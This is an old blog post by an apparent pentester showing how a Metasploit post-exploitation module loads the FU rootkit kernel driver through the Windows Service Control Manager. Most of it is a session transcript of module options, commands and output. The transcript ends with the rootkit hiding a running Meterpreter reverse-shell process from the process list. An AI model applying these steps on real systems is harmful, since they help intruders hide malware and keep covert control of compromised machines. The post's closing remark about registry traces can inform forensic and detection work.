Friday, January 3, 2014

Loading a kernel driver from Meterpreter

Since life in kernel space is more stealthy, you may want to load your own rootkit kernel driver to hide your shell, some process or connection, etc. and thus make your post-exploitation work more covertly. Not only rootkits but other kind of drivers could be really useful for a pentester. For example, we can load the packet capture driver (npf.sys) from Winpcap if we have the intention to sniff or inject packets into the network to carry out further attacks.

A good and confortable way to load drivers is by using the Service Control Manager API interface which allows you to run and load a kernel driver in a safe way through functions such as CreateServiceA, OpenSCManagerA and OpenServiceA. Taking advantage of Services mixin I made a simple module to achieve this from Meterpreter. Let's see an example with the well-known FU rootkit driver.

[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/driver_loader 
msf post(driver_loader) > set driver_name FU_RK
driver_name => FU_RK
msf post(driver_loader) > set driver_path c:\\windows\\system32\\drivers\\fu.sys
driver_path =>c:\windows\system32\drivers\fu.sys
msf post(driver_loader) > set session 1
session => 1
msf post(driver_loader) > show options

Module options (post/windows/manage/driver_loader):

   Name          Current Setting          Required  Description
   ----          ---------------          --------  -----------
   DRIVER_NAME   FU_RK                    yes       Driver Name.
   DRIVER_PATH   c:\windows\system32\drivers\fu.sys  yes       Driver path in %SYSTEMROOT%.Example: c:\windows\system32\msf.sys
   ERROR_TYPE    ignore                   yes       Error type. (accepted: ignore, normal, severe, critical)
   SERVICE_TYPE  kernel                   yes       Service type. (accepted: kernel, file_system, adapter, recognizer)
   SESSION       1                        yes       The session to run this module on.
   START_TYPE    auto                     yes       Start type. (accepted: boot, system, auto, demand, disabled)

msf post(driver_loader) > exploit

[*] Service object added to the Service Control Manager database.
[+] Driver loaded successfully.
[*] Post module execution completed

We can verify that the driver was loaded successfully.

Now we can use fu.exe to hide some processes.

meterpreter > shell
Process 1972 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Test\Desktop>cd %TEMP%
cd %TEMP%

C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
meterpreter_reverse.exe     1628 Console                 0      7.360 K

C:\DOCUME~1\Test\LOCALS~1\Temp>fu -ph 1628
fu -ph 1628

C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"


Note that a drawback of using SCM is that once the service has been installed, it will leave some artifacts in the registry under HKLM\SYSTEM\CurrentControlSet\Services which may raise suspicious from a forensic point of view.

No comments:

Post a Comment